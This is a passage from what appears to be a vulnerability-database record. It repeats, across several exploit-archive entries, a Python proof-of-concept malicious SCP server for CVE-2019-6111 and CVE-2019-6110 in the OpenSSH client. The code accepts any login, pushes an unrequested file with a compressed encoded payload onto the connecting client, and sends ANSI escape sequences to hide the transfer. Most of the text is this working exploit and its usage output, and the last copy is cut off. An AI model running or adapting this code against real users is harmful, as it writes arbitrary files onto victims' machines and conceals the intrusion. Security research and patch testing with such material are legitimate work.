\nb'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc' \nb'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS' \nb'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA' \n)) \n \nclass ScpServer(paramiko.ServerInterface): \ndef __init__(self): \nself.event = threading.Event() \n \ndef check_auth_password(self, username, password): \nlogging.info('Authenticated with %s:%s', username, password) \nreturn paramiko.AUTH_SUCCESSFUL \n \ndef check_channel_request(self, kind, chanid): \nlogging.info('Opened session channel %d', chanid) \nif kind == \"session\": \nreturn paramiko.OPEN_SUCCEEDED \nreturn paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED \n \ndef check_channel_exec_request(self, channel, command): \ncommand = command.decode('ascii') \nlogging.info('Approving exec request: %s', command) \nparts = command.split(' ') \n# Make sure that this is a request to get a file: \nassert parts[0] == 'scp' \nassert '-f' in parts \nfile = parts[-1] \n# Send file from a new thread. \nthreading.Thread(target=self.send_file, args=(channel, file)).start() \nreturn True \n \ndef send_file(self, channel, file): \n''' \nThe meat of the exploit: \n1. Send the requested file. \n2. Send another file (exploit.txt) that was not requested. \n3. Print ANSI escape sequences to stderr to hide the transfer of \nexploit.txt. \n''' \ndef wait_ok(): \nassert channel.recv(1024) == b'\\x00' \ndef send_ok(): \nchannel.sendall(b'\\x00') \n \nwait_ok() \n \nlogging.info('Sending requested file \"%s\" to channel %d', file, \nchannel.get_id()) \ncommand = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii') \nchannel.sendall(command) \nwait_ok() \nchannel.sendall(dummy) \nsend_ok() \nwait_ok() \n \n# This is CVE-2019-6111: whatever file the client requested, we send \n# them 'exploit.txt' instead. \nlogging.info('Sending malicious file \"exploit.txt\" to channel %d', \nchannel.get_id()) \ncommand = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii') \nchannel.sendall(command) \nwait_ok() \nchannel.sendall(payload) \nsend_ok() \nwait_ok() \n \n# This is CVE-2019-6110: the client will display the text that we send \n# to stderr, even if it contains ANSI escape sequences. We can send \n# ANSI codes that clear the current line to hide the fact that a second \n# file was transmitted.. \nlogging.info('Covering our tracks by sending ANSI escape sequence') \nchannel.sendall_stderr(\"\\x1b[1A\".encode('ascii')) \nchannel.close() \n \ndef main(): \nlogging.info('Creating a temporary RSA host key...') \nhost_key = paramiko.rsakey.RSAKey.generate(1024) \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nsock.bind(('localhost', 2222)) \nsock.listen(0) \nlogging.info('Listening on port 2222...') \n \nwhile True: \nclient, addr = sock.accept() \nlogging.info('Received connection from %s:%s', *addr) \ntransport = paramiko.Transport(client) \ntransport.add_server_key(host_key) \nserver = ScpServer() \ntransport.start_server(server=server) \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151227/sshtrangerthings-fileadd.txt"}], "zdt": [{"lastseen": "2019-02-06T05:17:10", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2019-01-20T00:00:00", "title": "OpenSSH 7.6p1 SCP Client - Multiple Vulnerabilities (SSHtranger Things) Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-20T00:00:00", "id": "1337DAY-ID-32009", "href": "https://0day.today/exploit/description/32009", "sourceData": "# Exploit Title: SSHtranger Things\r\n# Exploit Author: Mark E. Haase <[email\u00a0protected]>\r\n# Vendor Homepage: https://www.openssh.com/\r\n# Software Link: [download link if available]\r\n# Version: OpenSSH 7.6p1\r\n# Tested on: Ubuntu 18.04.1 LTS\r\n# CVE : CVE-2019-6111, CVE-2019-6110\r\n\r\n'''\r\nTitle: SSHtranger Things\r\nAuthor: Mark E. Haase <[email\u00a0protected]>\r\nHomepage: https://www.hyperiongray.com\r\nDate: 2019-01-17\r\nCVE: CVE-2019-6111, CVE-2019-6110\r\nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\r\nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1\r\n\r\nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be\r\nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`\r\npackage.\r\n\r\nThe server listens on port 2222. It accepts any username and password, and it\r\ngenerates a new host key every time you run it.\r\n\r\n $ python3 sshtranger_things.py\r\n\r\nDownload a file using a vulnerable client. The local path must be a dot:\r\n\r\n $ scp -P 2222 [email\u00a0protected]:test.txt .\r\n The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.\r\n RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.\r\n Are you sure you want to continue connecting (yes/no)? yes\r\n Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.\r\n [email\u00a0protected]'s password:\r\n test.txt 100% 32 0.7KB/s 00:00\r\n\r\nThe file you requested (e.g. test.txt) will be saved in your current directory.\r\nIf your client is vulnerable, you will have an additional file \"exploit.txt\"\r\ncreated in your current directory.\r\n\r\n $ cat test.txt\r\n This is the file you requested.\r\n $ cat exploit.txt\r\n SSHtranger Things\r\n\r\nThe interesting code is in ScpServer.send_file().\r\n'''\r\nimport base64\r\nimport gzip\r\nimport logging\r\nimport paramiko\r\nimport paramiko.rsakey\r\nimport socket\r\nimport threading\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\ndummy = 'This is the file you requested.\\n'\r\npayload = gzip.decompress(base64.b64decode(\r\n b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'\r\n b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'\r\n b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'\r\n b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'\r\n b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'\r\n b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'\r\n b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'\r\n b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'\r\n b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'\r\n b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'\r\n))\r\n\r\nclass ScpServer(paramiko.ServerInterface):\r\n def __init__(self):\r\n self.event = threading.Event()\r\n\r\n def check_auth_password(self, username, password):\r\n logging.info('Authenticated with %s:%s', username, password)\r\n return paramiko.AUTH_SUCCESSFUL\r\n\r\n def check_channel_request(self, kind, chanid):\r\n logging.info('Opened session channel %d', chanid)\r\n if kind == \"session\":\r\n return paramiko.OPEN_SUCCEEDED\r\n return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED\r\n\r\n def check_channel_exec_request(self, channel, command):\r\n command = command.decode('ascii')\r\n logging.info('Approving exec request: %s', command)\r\n parts = command.split(' ')\r\n # Make sure that this is a request to get a file:\r\n assert parts[0] == 'scp'\r\n assert '-f' in parts\r\n file = parts[-1]\r\n # Send file from a new thread.\r\n threading.Thread(target=self.send_file, args=(channel, file)).start()\r\n return True\r\n\r\n def send_file(self, channel, file):\r\n '''\r\n The meat of the exploit:\r\n 1. Send the requested file.\r\n 2. Send another file (exploit.txt) that was not requested.\r\n 3. Print ANSI escape sequences to stderr to hide the transfer of\r\n exploit.txt.\r\n '''\r\n def wait_ok():\r\n assert channel.recv(1024) == b'\\x00'\r\n def send_ok():\r\n channel.sendall(b'\\x00')\r\n\r\n wait_ok()\r\n\r\n logging.info('Sending requested file \"%s\" to channel %d', file,\r\n channel.get_id())\r\n command = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(dummy)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6111: whatever file the client requested, we send\r\n # them 'exploit.txt' instead.\r\n logging.info('Sending malicious file \"exploit.txt\" to channel %d',\r\n channel.get_id())\r\n command = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(payload)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6110: the client will display the text that we send\r\n # to stderr, even if it contains ANSI escape sequences. We can send\r\n # ANSI codes that clear the current line to hide the fact that a second\r\n # file was transmitted..\r\n logging.info('Covering our tracks by sending ANSI escape sequence')\r\n channel.sendall_stderr(\"\\x1b[1A\".encode('ascii'))\r\n channel.close()\r\n\r\ndef main():\r\n logging.info('Creating a temporary RSA host key...')\r\n host_key = paramiko.rsakey.RSAKey.generate(1024)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock.bind(('localhost', 2222))\r\n sock.listen(0)\r\n logging.info('Listening on port 2222...')\r\n\r\n while True:\r\n client, addr = sock.accept()\r\n logging.info('Received connection from %s:%s', *addr)\r\n transport = paramiko.Transport(client)\r\n transport.add_server_key(host_key)\r\n server = ScpServer()\r\n transport.start_server(server=server)\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2019-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32009"}], "exploitdb": [{"lastseen": "2019-01-18T16:58:32", "description": "", "published": "2019-01-18T00:00:00", "type": "exploitdb", "title": "SCP Client - Multiple Vulnerabilities (SSHtranger Things)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6111", "CVE-2019-6110"], "modified": "2019-01-18T00:00:00", "id": "EDB-ID:46193", "href": "https://www.exploit-db.com/exploits/46193", "sourceData": "# Exploit Title: SSHtranger Things\r\n# Date: 2019-01-17\r\n# Exploit Author: Mark E. Haase <mhaase@hyperiongray.com>\r\n# Vendor Homepage: https://www.openssh.com/\r\n# Software Link: [download link if available]\r\n# Version: OpenSSH 7.6p1\r\n# Tested on: Ubuntu 18.04.1 LTS\r\n# CVE : CVE-2019-6111, CVE-2019-6110\r\n\r\n'''\r\nTitle: SSHtranger Things\r\nAuthor: Mark E. Haase <mhaase@hyperiongray.com>\r\nHomepage: https://www.hyperiongray.com\r\nDate: 2019-01-17\r\nCVE: CVE-2019-6111, CVE-2019-6110\r\nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\r\nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1\r\n\r\nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be\r\nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`\r\npackage.\r\n\r\nThe server listens on port 2222. It accepts any username and password, and it\r\ngenerates a new host key every time you run it.\r\n\r\n $ python3 sshtranger_things.py\r\n\r\nDownload a file using a vulnerable client. The local path must be a dot:\r\n\r\n $ scp -P 2222 foo@localhost:test.txt .\r\n The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.\r\n RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.\r\n Are you sure you want to continue connecting (yes/no)? yes\r\n Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.\r\n foo@localhost's password:\r\n test.txt 100% 32 0.7KB/s 00:00\r\n\r\nThe file you requested (e.g. test.txt) will be saved in your current directory.\r\nIf your client is vulnerable, you will have an additional file \"exploit.txt\"\r\ncreated in your current directory.\r\n\r\n $ cat test.txt\r\n This is the file you requested.\r\n $ cat exploit.txt\r\n SSHtranger Things\r\n\r\nThe interesting code is in ScpServer.send_file().\r\n'''\r\nimport base64\r\nimport gzip\r\nimport logging\r\nimport paramiko\r\nimport paramiko.rsakey\r\nimport socket\r\nimport threading\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\ndummy = 'This is the file you requested.\\n'\r\npayload = gzip.decompress(base64.b64decode(\r\n b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'\r\n b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'\r\n b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'\r\n b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'\r\n b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'\r\n b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'\r\n b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'\r\n b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'\r\n b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'\r\n b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'\r\n))\r\n\r\nclass ScpServer(paramiko.ServerInterface):\r\n def __init__(self):\r\n self.event = threading.Event()\r\n\r\n def check_auth_password(self, username, password):\r\n logging.info('Authenticated with %s:%s', username, password)\r\n return paramiko.AUTH_SUCCESSFUL\r\n\r\n def check_channel_request(self, kind, chanid):\r\n logging.info('Opened session channel %d', chanid)\r\n if kind == \"session\":\r\n return paramiko.OPEN_SUCCEEDED\r\n return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED\r\n\r\n def check_channel_exec_request(self, channel, command):\r\n command = command.decode('ascii')\r\n logging.info('Approving exec request: %s', command)\r\n parts = command.split(' ')\r\n # Make sure that this is a request to get a file:\r\n assert parts[0] == 'scp'\r\n assert '-f' in parts\r\n file = parts[-1]\r\n # Send file from a new thread.\r\n threading.Thread(target=self.send_file, args=(channel, file)).start()\r\n return True\r\n\r\n def send_file(self, channel, file):\r\n '''\r\n The meat of the exploit:\r\n 1. Send the requested file.\r\n 2. Send another file (exploit.txt) that was not requested.\r\n 3. Print ANSI escape sequences to stderr to hide the transfer of\r\n exploit.txt.\r\n '''\r\n def wait_ok():\r\n assert channel.recv(1024) == b'\\x00'\r\n def send_ok():\r\n channel.sendall(b'\\x00')\r\n\r\n wait_ok()\r\n\r\n logging.info('Sending requested file \"%s\" to channel %d', file,\r\n channel.get_id())\r\n command = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(dummy)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6111: whatever file the client requested, we send\r\n # them 'exploit.txt' instead.\r\n logging.info('Sending malicious file \"exploit.txt\" to channel %d',\r\n channel.get_id())\r\n command = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(payload)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6110: the client will display the text that we send\r\n # to stderr, even if it contains ANSI escape sequences. We can send\r\n # ANSI codes that clear the current line to hide the fact that a second\r\n # file was transmitted..\r\n logging.info('Covering our tracks by sending ANSI escape sequence')\r\n channel.sendall_stderr(\"\\x1b[1A\".encode('ascii'))\r\n channel.close()\r\n\r\ndef main():\r\n logging.info('Creating a temporary RSA host key...')\r\n host_key = paramiko.rsakey.RSAKey.generate(1024)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock.bind(('localhost', 2222))\r\n sock.listen(0)\r\n logging.info('Listening on port 2222...')\r\n\r\n while True:\r\n client, addr = sock.accept()\r\n logging.info('Received connection from %s:%s', *addr)\r\n transport = paramiko.Transport(client)\r\n transport.add_server_key(host_key)\r\n server = ScpServer()\r\n transport.start_server(server=server)\r\n\r\nif __name__ == '__main__':\r\n main()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46193"}, {"lastseen": "2019-03-07T22:40:03", "description": "", "published": "2019-01-11T00:00:00", "type": "exploitdb", "title": "OpenSSH SCP Client - Write Arbitrary Files", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6111", "CVE-2019-6110"], "modified": "2019-01-11T00:00:00", "id": "EDB-ID:46516", "href": "https://www.exploit-db.com/exploits/46516", "sourceData": "'''\r\nTitle: SSHtranger Things\r\nAuthor: Mark E. Haase <mhaase@hyperiongray.com>\r\nHomepage: https://www.hyperiongray.com\r\nDate: 2019-01-17\r\nCVE: CVE-2019-6111, CVE-2019-6110\r\nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\r\nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1\r\n\r\nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be\r\nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`\r\npackage.\r\n\r\nThe server listens on port 2222. It accepts any username and password, and it\r\ngenerates a new host key every time you run it.\r\n\r\n $ python3 sshtranger_things.py\r\n\r\nDownload a file using a vulnerable client. The local path must be a dot:\r\n\r\n $ scp -P 2222 foo@localhost:test.txt .\r\n The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.\r\n RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.\r\n Are you sure you want to continue connecting (yes/no)? yes\r\n Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.\r\n foo@localhost's password:\r\n test.txt 100% 32 0.7KB/s 00:00\r\n\r\nThe file you requested (e.g. test.txt) will be saved in your current directory.\r\nIf your client is vulnerable, you will have an additional file \"exploit.txt\"\r\ncreated in your current directory.\r\n\r\n $ cat test.txt\r\n This is the file you requested.\r\n $ cat exploit.txt\r\n SSHtranger Things\r\n\r\nThe interesting code is in ScpServer.send_file().\r\n'''\r\nimport base64\r\nimport gzip\r\nimport logging\r\nimport paramiko\r\nimport paramiko.rsakey\r\nimport socket\r\nimport threading\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\ndummy = 'This is the file you requested.\\n'\r\npayload = gzip.decompress(base64.b64decode(\r\n b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'\r\n b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'\r\n b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'\r\n b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'\r\n b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'\r\n b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'\r\n b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'\r\n b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'\r\n b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'\r\n b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'\r\n))\r\n\r\nclass ScpServer(paramiko.ServerInterface):\r\n def __init__(self):\r\n self.event = threading.Event()\r\n\r\n def check_auth_password(self, username, password):\r\n logging.info('Authenticated with %s:%s', username, password)\r\n return paramiko.AUTH_SUCCESSFUL\r\n\r\n def check_channel_request(self, kind, chanid):\r\n logging.info('Opened session channel %d', chanid)\r\n if kind == \"session\":\r\n return paramiko.OPEN_SUCCEEDED\r\n return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED\r\n\r\n def check_channel_exec_request(self, channel, command):\r\n command = command.decode('ascii')\r\n logging.info('Approving exec request: %s', command)\r\n parts = command.split(' ')\r\n # Make sure that this is a request to get a file:\r\n assert parts[0] == 'scp'\r\n assert '-f' in parts\r\n file = parts[-1]\r\n # Send file from a new thread.\r\n threading.Thread(target=self.send_file, args=(channel, file)).start()\r\n return True\r\n\r\n def send_file(self, channel, file):\r\n '''\r\n The meat of the exploit:\r\n 1. Send the requested file.\r\n 2. Send another file (exploit.txt) that was not requested.\r\n 3. Print ANSI escape sequences to stderr to hide the transfer of\r\n exploit.txt.\r\n '''\r\n def wait_ok():\r\n assert channel.recv(1024) == b'\\x00'\r\n def send_ok():\r\n channel.sendall(b'\\x00')\r\n\r\n wait_ok()\r\n\r\n logging.info('Sending requested file \"%s\" to channel %d', file,\r\n channel.get_id())\r\n command = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(dummy)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6111: whatever file the client requested, we send\r\n # them 'exploit.txt' instead.\r\n logging.info('Sending malicious file \"exploit.txt\" to channel %d',\r\n channel.get_id())\r\n command = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii')\r\n channel.sendall(command)\r\n wait_ok()\r\n channel.sendall(payload)\r\n send_ok()\r\n wait_ok()\r\n\r\n # This is CVE-2019-6110: the client will display the text that we send\r\n # to stderr, even if it contains ANSI escape sequences. We can send\r\n # ANSI codes that clear the current line to hide the fact that a second\r\n # file was transmitted..\r\n logging.info('Covering our tracks by sending ANSI escape sequence')\r\n channel.sendall_stderr(\"\\x1b[1A\".encode('ascii'))\r\n channel.close()\r\n\r\ndef main():\r\n logging.info('Creating a temporary RSA host key...')\r\n host_key = paramiko.rsakey.RSAKey.generate(1024)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n sock.bind(('localhost', 2222))\r\n sock.listen(0)\r\n logging.info('Listening on port 2222...')\r\n\r\n while True:\r\n client, addr = sock.accept()\r\n logging.info('Received connection from %s:%s', *addr)\r\n transport = paramiko.Transport(client)\r\n transport.add_server_key(host_key)\r\n server = ScpServer()\r\n transport.start_server(server=server)\r\n\r\nif __name__ == '__main__':\r\n main()", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46516"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSH SCP Client - Write Arbitrary Files", "edition": 1, "published": "2019-01-11T00:00:00", "title": "OpenSSH SCP Client - Write Arbitrary Files", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-11T00:00:00", "id": "EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97", "href": "", "sourceData": "'''\nTitle: SSHtranger Things\nAuthor: Mark E. Haase <mhaase@hyperiongray.com>\nHomepage: https://www.hyperiongray.com\nDate: 2019-01-17\nCVE: CVE-2019-6111, CVE-2019-6110\nAdvisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt\nTested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1\n\nWe have nicknamed this \"SSHtranger Things\" because the bug is so old it could be\nexploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`\npackage.\n\nThe server listens on port 2222. It accepts any username and password, and it\ngenerates a new host key every time you run it.\n\n $ python3 sshtranger_things.py\n\nDownload a file using a vulnerable client. The local path must be a dot:\n\n $ scp -P 2222 foo@localhost:test.txt .\n The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.\n RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.\n Are you sure you want to continue connecting (yes/no)? yes\n Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.\n foo@localhost's password:\n test.txt 100% 32 0.7KB/s 00:00\n\nThe file you requested (e.g. test.txt) will be saved in your current directory.\nIf your client is vulnerable, you will have an additional file \"exploit.txt\"\ncreated in your current directory.\n\n $ cat test.txt\n This is the file you requested.\n $ cat exploit.txt\n SSHtranger Things\n\nThe interesting code is in ScpServer.send_file().\n'''\nimport base64\nimport gzip\nimport logging\nimport paramiko\nimport paramiko.rsakey\nimport socket\nimport threading\n\nlogging.basicConfig(level=logging.INFO)\n\ndummy = 'This is the file you requested.\\n'\npayload = gzip.decompress(base64.b64decode(\n b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'\n b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'\n b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'\n b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'\n b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'\n b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'\n b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'\n b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'\n b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'\n b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'\n))\n\nclass ScpServer(paramiko.ServerInterface):\n def __init__(self):\n self.event = threading.Event()\n\n def check_auth_password(self, username, password):\n logging.info('Authenticated with %s:%s', username, password)\n return paramiko.AUTH_SUCCESSFUL\n\n def check_channel_request(self, kind, chanid):\n logging.info('Opened session channel %d', chanid)\n if kind == \"session\":\n return paramiko.OPEN_SUCCEEDED\n return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED\n\n def check_channel_exec_request(self, channel, command):\n command = command.decode('ascii')\n logging.info('Approving exec request: %s', command)\n parts = command.split(' ')\n # Make sure that this is a request to get a file:\n assert parts[0] == 'scp'\n assert '-f' in parts\n file = parts[-1]\n # Send file from a new thread.\n threading.Thread(target=self.send_file, args=(channel, file)).start()\n return True\n\n def send_file(self, channel, file):\n '''\n The meat of the exploit:\n 1. Send the requested file.\n 2. Send another file (exploit.txt) that was not requested.\n 3. Print ANSI escape sequences to stderr to hide the transfer of\n exploit.txt.\n '''\n def wait_ok():\n assert channel.recv(1024) == b'\\x00'\n def send_ok():\n channel.sendall(b'\\x00')\n\n wait_ok()\n\n logging.info('Sending requested file \"%s\" to channel %d', file,\n channel.get_id())\n command = 'C0664 {} {}\\n'.format(len(dummy), file).encode('ascii')\n channel.sendall(command)\n wait_ok()\n channel.sendall(dummy)\n send_ok()\n wait_ok()\n\n # This is CVE-2019-6111: whatever file the client requested, we send\n # them 'exploit.txt' instead.\n logging.info('Sending malicious file \"exploit.txt\" to channel %d',\n channel.get_id())\n command = 'C0664 {} exploit.txt\\n'.format(len(payload)).encode('ascii')\n channel.sendall(command)\n wait_ok()\n channel.sendall(payload)\n send_ok()\n wait_ok()\n\n # This is CVE-2019-6110: the client will display the text that we send\n # to stderr, even if it contains ANSI escape sequences. We can send\n # ANSI codes that clear the current line to hide the fact that a second\n # file was transmitted..\n logging.info('Covering our tracks by sending ANSI escape sequence')\n channel.sendall_stderr(\"\\x1b[1A\".encode('ascii'))\n 